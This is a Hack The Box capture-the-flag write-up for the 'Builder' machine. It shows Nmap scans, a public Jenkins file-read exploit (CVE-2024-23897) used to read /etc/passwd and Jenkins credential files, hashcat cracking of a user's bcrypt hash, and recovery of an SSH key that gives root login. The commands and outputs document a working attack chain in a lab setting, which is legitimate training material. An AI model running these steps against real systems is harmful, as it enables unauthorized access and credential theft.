Builder - wook413

#hackthebox #linux #medium #jenkins ![[Pasted image 20250819234637.png]] # Information Gathering - Nmap First off, I started scanning all TCP ports with `Nmap`. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-20 02:21 UTC Nmap scan report for 10.10.11.10 Host is up (0.057s latency). Not shown: 65186 closed tcp ports (reset), 347 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 8080/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 18.74 seconds ``` I discovered ports 22 and 80. I ran another TCP scan against them with `-sCV` options to gather more information. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 22,8080 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-20 02:22 UTC Nmap scan report for 10.10.11.10 Host is up (0.049s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA) |_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519) 8080/tcp open http Jetty 10.0.18 |_http-server-header: Jetty(10.0.18) | http-robots.txt: 1 disallowed entry |_/ | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-title: Dashboard [Jenkins] Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.63 seconds ``` Lastly, a UDP scan against top 10 ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-20 02:25 UTC Nmap scan report for 10.10.11.10 Host is up (0.048s latency). PORT STATE SERVICE 53/udp open|filtered domain 67/udp open|filtered dhcps 123/udp closed ntp 135/udp closed msrpc 137/udp closed netbios-ns 138/udp closed netbios-dgm 161/udp closed snmp 445/udp closed microsoft-ds 631/udp closed ipp 1434/udp closed ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 5.13 seconds ``` --- # Enumeration ##### HTTP - TCP 8080 As we saw from the output of Nmap, it's a `Jenkins` service on port 8080. In the past, I remember getting my initial access via `Groovy Script` when it comes to Jenkins service. However, I couldn't find Groovy Script on the webpage. Probably because I am not logged in. ![[Pasted image 20250819212900.png]] Under `People` tab, we see one user named `jennifer`. ![[Pasted image 20250819224334.png]] The webpage displays the version information at the bottom right: `Jenkins 2.441`. I looked it up on `Searchsploit` and it revealed one known exploit to the corresponding version: `LFI`. ![[Pasted image 20250819213245.png]] I downloaded the exploit. `searchsploit -m 51993` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ python3 51993.py -h usage: 51993.py [-h] -u URL [-p PATH] Local File Inclusion exploit for CVE-2024-23897 options: -h, --help show this help message and exit -u, --url URL The url of the vulnerable Jenkins service. Ex: http://helloworld.com/ -p, --path PATH The absolute path of the file to download ``` I have given the exploit required parameters and it successfully included `/etc/passwd` file ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ python3 51993.py -u http://$IP:8080 -p /etc/passwd www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin root:x:0:0:root:/root:/bin/bash mail:x:8:8:mail:/var/mail:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin _apt:x:42:65534::/nonexistent:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin jenkins:x:1000:1000::/var/jenkins_home:/bin/bash games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync ``` The official `Jenkins` ' security advisory explains the details of the vulnerability (CVE-2024-23897) ![[Pasted image 20250819215417.png]] In addition to `/etc/passwd`, I searched for `/proc/self/environ` file and discovered some information. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ python3 51993.py -u http://$IP:8080 -p /proc/self/environ HOSTNAME=0f52c222a4cc JENKINS_UC_EXPERIMENTAL=https://updates.jenkins.io/experimental JAVA_HOME=/opt/java/openjdk JENKINS_INCREMENTALS_REPO_MIRROR=https://repo.jenkins-ci.org/incrementals COPY_REFERENCE_FILE_LOG=/var/jenkins_home/copy_reference_file.log PWD=/ JENKINS_SLAVE_AGENT_PORT=50000 JENKINS_VERSION=2.441 HOME=/var/jenkins_home LANG=C.UTF8 JENKINS_UC=https://updates.jenkins.io SHLVL=0 JENKINS_HOME=/var/jenkins_home REF=/usr/share/jenkins/ref PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ``` According to the output above, `Jenkins`' home directory is `/var/jenkins_home`. I appended `/user.txt` to see if it exists and it did. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ python3 51993.py -u http://$IP:8080 -p /var/jenkins_home/user.txt eba2... ``` I tried installing `Jenkins` on my kali using `docker` with the following command: ```bash docker run -p 8080:8080 --restart=on-failure jenkins/jenkins:lts-jdk17 ``` Then it show me the initial password and the location it's stored. ![[Pasted image 20250819221638.png]] That's the default path for `Jenkins` to store password information but unfortunately it returned `File not found` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ python3 51993.py -u http://$IP:8080 -p /var/jenkins_home/secrets/initialAdminPassword File not found. ``` `Jenkins` stores information about its user accounts in `/var/jenkins_home/users/users.xml`. Inside, we can see a directory named `jennifer_12108429903186576833`, which corresponds to the only user we saw on the webpage at port 8080. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ python3 51993.py -u http://$IP:8080 -p /var/jenkins_home/users/users.xml <?xml version='1.1' encoding='UTF-8'?> <string>jennifer_12108429903186576833</string> <idToDirectoryNameMap class="concurrent-hash-map"> <entry> <string>jennifer</string> <version>1</version> </hudson.model.UserIdMapper> </idToDirectoryNameMap> <hudson.model.UserIdMapper> </entry> ``` Finally, the config file in the following path `/var/jenkins_home/users/jennifer_12108429903186576833/config.xml` contained a lot of information about user `Jennifer` including her password hash. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ python3 51993.py -u http://$IP:8080 -p /var/jenkins_home/users/jennifer_12108429903186576833/config.xml <passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash> ``` Let's crack the hash! ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ echo '$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a' > hash.txt ┌──(kali㉿kali)-[~/Desktop] └─$ hashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt ``` Successfully cracked the hash. The password is `princess` ```bash $2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a:princess Session..........: hashcat Status...........: Cracked Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix)) Hash.Target......: $2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQ.../L4l1a Time.Started.....: Wed Aug 20 03:59:33 2025 (1 sec) Time.Estimated...: Wed Aug 20 03:59:34 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 65 H/s (3.38ms) @ Accel:4 Loops:16 Thr:1 Vec:1 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 16/14344385 (0.00%) Rejected.........: 0/16 (0.00%) Restore.Point....: 0/14344385 (0.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1008-1024 Candidate.Engine.: Device Generator Candidates.#1....: 123456 -> jessica Hardware.Mon.#1..: Util: 31% Started: Wed Aug 20 03:59:29 2025 Stopped: Wed Aug 20 03:59:35 2025 ``` # Shell as `root` I logged into `Jenkins` with `jennifer:princess` ![[Pasted image 20250819230216.png]] ![[Pasted image 20250819230301.png]] There's `SSH private key` but it doesn't directly show you the key in plaintext. There's an update option. ![[Pasted image 20250819230603.png]] Interestingly enough, When I did `View Page Source` on the page, it displayed what appeared to be the private key. Its CSS display attribute is set to hidden though. ![[Pasted image 20250819231303.png]] I explore `Jenkins` on port 8080 and now that I am logged in as `jeniffer`, I am able to see `Script Console`. I decrypted the encrypted SSH key I found in `View Page Source`. ![[Pasted image 20250819233459.png]] Made a new file named `private_key`, copy-pasted the key, changed file permissions to `500` and finally attempted to log into SSH with the key. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ chmod 500 private_key ┌──(kali㉿kali)-[~/Desktop] └─$ ls -l private_key -r-x------ 1 kali kali 2602 Aug 20 04:38 private_key ``` Successfully logged into `SSH` as `root` ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ ssh -i private_key root@$IP Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-94-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro System information as of Wed Aug 20 04:38:56 AM UTC 2025 System load: 0.0 Usage of /: 66.2% of 5.81GB Memory usage: 21% Swap usage: 0% Processes: 214 Users logged in: 0 IPv4 address for docker0: 172.17.0.1 IPv4 address for eth0: 10.10.11.10 IPv6 address for eth0: dead:beef::250:56ff:feb0:5d59 Expanded Security Maintenance for Applications is not enabled. 0 updates can be applied immediately. Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status The list of available updates is more than a week old. To check for new updates run: sudo apt update Last login: Mon Feb 12 13:15:44 2024 from 10.10.14.40 root@builder:~# whoami root ``` Found `root.txt` ```bash root@builder:~# cat root.txt f0f... root@builder:~# ```